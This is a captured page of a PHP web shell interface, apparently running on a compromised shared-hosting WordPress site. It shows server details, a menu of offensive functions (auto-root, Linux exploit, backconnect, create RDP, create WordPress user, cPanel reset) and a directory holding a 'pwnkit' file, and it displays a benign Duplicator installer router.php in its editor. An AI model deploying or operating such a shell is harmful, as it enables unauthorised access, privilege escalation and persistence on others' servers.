Linux webm001.cluster111.gra.hosting.ovh.net 5.15.206-ovh-vps-grsec-zfs-classid #1 SMP Fri May 15 02:41:25 UTC 2026 x86_64
Apache
: 10.111.20.1 | : 216.73.216.115
Cant Read [ /etc/named.conf ]
7.4.33
osteocoeek
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
osteocoeek /
holistea.eu /
dup-installer /
api /
[ HOME SHELL ]
Name
Size
Permission
Action
.mad-root
0
B
-rw-r--r--
class.api.php
12.92
KB
-rw-r--r--
class.cpnl.base.php
78.08
KB
-rw-r--r--
class.cpnl.ctrl.php
14.69
KB
-rw-r--r--
index.php
82
B
-rw-r--r--
pwnkit
0
B
-rwxr-xr-x
router.php
4.56
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : router.php
<?php if (!defined('DUPXABSPATH')) { define('DUPXABSPATH', dirname(__FILE__)); } $GLOBALS['DUPX_ROOT'] = str_replace("\\", '/', (realpath(dirname(dirname(dirname(__FILE__)))))); $GLOBALS['DUPX_ROOT_URL'] = rtrim("http".(!empty($_SERVER['HTTPS']) ? "s" : "")."://".$_SERVER['SERVER_NAME'].dirname(dirname(dirname($_SERVER['PHP_SELF']))), '/'); $GLOBALS['DUPX_INIT'] = $GLOBALS['DUPX_ROOT'].'/dup-installer'; $GLOBALS['DUPX_INIT_URL'] = $GLOBALS['DUPX_ROOT_URL'].'/dup-installer'; require_once($GLOBALS['DUPX_INIT'].'/classes/config/class.boot.php'); /** * init constants and include */ DUPX_Boot::init(); require_once('class.api.php'); require_once('class.cpnl.base.php'); require_once('class.cpnl.ctrl.php'); //Register API Engine - If it processes the current route it spits out JSON and exits the process $API_Server = new DUPX_API_Server(); $API_Server->add_controller(new DUPX_cPanel_Controller()); $API_Server->process_request(false); ?> <!DOCTYPE html> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <meta name="robots" content="noindex,nofollow"> <title>WordPress Duplicator</title> <style> div#content {width:950px !important} div#api-area {margin:auto; line-height:21px } div#api-area table {width:100%} div#api-area table td:first-child{width:40%; padding-right:15px} div#api-area table td{vertical-align:top; text-align:left} iframe#api-results {margin:auto; width:97%; height:90%; border:1px solid silver; min-height: 500px} div.api-details {font-size:11px} form.api-form {display:none; padding-left:20px} form.api-form input[type=text] {width:100%; font-size:12px; padding:3px} input#api-results-txt {width:96% !important; background: #efefef;} div#api-area {padding:15px} div.api-area a.operation {font-size:20px; text-decoration: none !important;} div.api-area pre {font-size:11px; line-height: 13px; padding: 2px; border:1px solid silver; background: #efefef; border-radius: 3px} </style> <?php require_once("{$GLOBALS['DUPX_INIT']}/assets/inc.libs.css.php"); require_once("{$GLOBALS['DUPX_INIT']}/assets/inc.css.php"); require_once("{$GLOBALS['DUPX_INIT']}/assets/inc.libs.js.php"); require_once("{$GLOBALS['DUPX_INIT']}/assets/inc.js.php"); ?> <script> function RequestAPI(template, test) { var url = window.location.href; url = url + template; if (test == 0) { $('#api-results-txt').val(url); $('#api-results').attr('src', url); } else { window.open(url, 'api-window'); } } </script> </head> <body> <div id="content"> <table cellspacing="0" class="header-wizard"> <tr> <td style="width:100%;"> <div style="font-size:22px; padding:5px 0px 0px 0px"> Duplicator Pro - Installer - API</div> </td> <td style="white-space:nowrap; text-align:right"></td> </tr> <tr> <td><div style="margin:4px 0px 10px 15px;"></div></td> <td class="wiz-dupx-version">version: <?php echo $GLOBALS['DUPX_AC']->version_dup ?> </td> </tr> </table> <div id="api-area"> <div class="hdr-main"> API ROUTES: <!--div style="float:right; font-size:12px"> <input type="checkbox" name="api-debug" id="api-debug"> <label for="api-debug">Debug Routes</label> </div--> </div> <div class="api-area"> <table> <tr> <td> <b>OPERATIONS:</b> <?php foreach($API_Server->controllers as $class) : ?> <div style="padding: 5px 0 5px 0;"> <?php $id = uniqid(); $name = str_replace('/cpnl/', 'cpnl/', $class->operation); ?> <a href="javascript:void(0)" onclick="$('#frm-<?php echo esc_js($id); ?>').toggle()" class="operation">»<?php echo esc_html($name); ?></a><br/> <form id="frm-<?php echo $id ?>" class="api-form"> <input id="txt-<?php echo DUPX_U::esc_attr($id); ?>" type="text" value="<?php echo DUPX_U::esc_attr($class->template); ?>" /> <br/> <a href="javascript:void(0)" onclick="RequestAPI($('#txt-<?php echo DUPX_U::esc_js($id) ?>').val(), 0)">[Test]</a> <a href="javascript:void(0)" onclick="RequestAPI($('#txt-<?php echo DUPX_U::esc_js($id); ?>').val(), 1)">[New Window]</a> <div class="api-details" id="details-<?php echo DUPX_U::esc_attr($id); ?>"> <?php DUPX_U::dump($class, 1); ?> </div> </form> </div> <?php endforeach; ?> </td> <td> <b>TEST RESULTS:</b> <br/> <input id="api-results-txt" type="text" readonly="true" /> <br/> <iframe id="api-results" /> </td> </tr> </table> </div> </div> <!-- END OF VIEW API -->
Close